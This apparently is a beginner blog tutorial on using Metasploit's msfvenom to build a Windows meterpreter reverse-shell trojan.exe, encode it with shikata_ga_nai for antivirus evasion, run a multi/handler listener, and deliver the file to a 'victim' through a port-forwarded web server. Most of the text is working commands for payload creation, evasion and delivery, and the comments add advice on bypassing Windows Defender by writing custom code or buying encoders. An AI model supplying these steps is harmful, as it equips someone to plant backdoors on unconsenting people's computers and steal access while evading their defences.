Hello and welcome on my blog, I am reaching you with latest and knowledgeable post. As you know msfpayload was used to create payloads ( general called trojan /backdoor ) and msfencode was used to encode payloads for avoiding antivirus detection. you can read in my old post Creating Trojan Horse (Encoded)By Using Msfpayload but both of them msfpayload and msfencode have been removed from metasploit framework on june 8th 2015.
So what is now?
Answer is msfvenom
In this article I will cover what is msfvenom, use of msfvenom, generate and encode payload by msfvenom, avoid bad characters by msfvenom, start multi handler server to listen trojan backdoor.
What is msfvenom ?
In simple word “msfvenom is a combination of msfpayload and msfencode. it is used to generate payloads and encode them as well.” Now you don’t have need to run two different commands to create payload and encode it. msfvenom comes default in metasploit, so you don’t need to install extra package in your system for more detail about metasploit https://www.metasploit.com/ and for Tutorial you read my metasploit guide section.
Metasploit command line intereface msfconsole and GUI Armitage are preinstalled in Kali Linux current version Kali 2016.2 . I will describe the tutorial by using Kali Linux.
Let’s start using MSFvenom
In Kali Linux, right click on the desktop desktop then click on the open terminal. New terminal window will be open type the following command
#msfvenom -h
How to generate a payload using MSFvenom
To generate a payload there are two switch must be use -p and -f. -p for payload and -f for output file format. You should know first which payload you are going to use. To print the available list of payload use -l
#msfvenom -l payloads
After selecting appropriate payload. Use the following code
#msfvenom -p <payload> -f <file format>
To know more about formats use the following code
#msfvenom –help-formats
#msfvenom -p windows/meterpreter/reverse_tcp -f exe > PATH
Final code would be
#msfvenom -p windows/meterpreter/reverse_tcp -f exe > /root/Desktop/trojan.exe
Before execute final code you should know about payloads options to be used. You can see in the above code payload is for giving connection back to attacker. But it will not send back connection to attacker, reason, in this code options are not specified yet. So you must know about available options for windows/meterpreter/reverse_tcp. Go through the following code
#msfvenom –payload-options -p <payload >
Now the code is
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=[desired port] -f exe > root/Desktop/trojan.exe
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=4444 -f exe > root/Desktop/trojan.exe
It’s a good news that your payload is ready, you can send this payload to victim machine and when the victim will execute this file he will be hacked. But this payload is well known and most of antivirus are aware about it. Antivirus will detect easily this code and will remove it. So what is next.
You can do the following things;
- Avoid the bad character
- Encode the payload
- Iterations
How to avoid bad character from the payloads by using msfvenom
As you have seen in the help menu of msfvenom, -b flag to be used to avoid certain bad characters from the payload. Whne the -b switch is used, msfvenom find good encoder to encode the payload and avoid bad character automatically
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -b ‘/x00’ -f exe > root/Desktop/trojan.exe
How to encode a payload by msfvenom
When you will use -b flag, payload will be encode automatic with good encoder. But if you still want to use a specific encoder then you can use -e [encoder name] code. You can use only available encoder with msfvenom. So first use the following code to know about available encoder
Msfvenom -l encoder
Your final code will be
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -f exe > root/Desktop/trojan.exe
Iterations:
The number of times to encode the payload
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > root/Desktop/trojan.exe
Use architecture and platform for payload by msfvenom
-a <x64/x86> to be used for define architecture. and –platform for platform but first check available platform in metasploit.
msfvenom –help-platforms
#msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > root/Desktop/trojan.exe
Start multihandler server on attacker machine
Trojan will be executed on victim’s machine and it will send a back connection to attacker machine. So attacker must have a listener server on its machine. You can start multi handler server on your attacker machine by following instruction
#msfconsole
msf>use exploit/multi/handler
>set payload windows/meterpreter/reverse_tcp
>set LHOST 192.168.56.100 [attacker IP]
>set LPORT 4444
>exploit
This is very important phase. you have created trojan.exe and started multi/handler server, Next step send to victim machine. I started apache2 web server and moved trojan.exe /var/www/html. and I have forwarded port 80 to my attacker machine on router. and I send link http://AttackerIP/trojan.exe. Victim download trojan and execute it. the session will be created
MODULE 13:- Metasploit Framework
- 6 Metasploit Modules – You should know
- MSFvenom replacement of MSFpayload and msfencode – Full guide
- 6 Techniques to analyze the vulnerability scan report in Metasploit
- How to use Metasploit for vulnerability scanning
- How to use metasploit pro in Kali Linux
- Creating Persistent Backdoor By Metasploit in Kali Linux
- Creating Trojan Horse (Encoded)By Using Msfpayload
6 thoughts on “MSFvenom replacement of MSFpayload and msfencode Guide for Beginners”
I tried it but anti virus even windows defender is able to detect the virus. Is there any other way to evade the detection even though there is Quick Heal Total Security?
Hi Mitul,
Your question is good, but this is well known code, so all Antivirus has its signature and they detect easily. some time encoding is work properly. if you really want to bypass AV, you should write own code or use any paid encoder.
Thanks
I am getting this error
handler failed to bind (public ip) :1337
I am using lhost as my dynamic dns host
I didn’t get you at dynamic dns host.
Would you like to explain?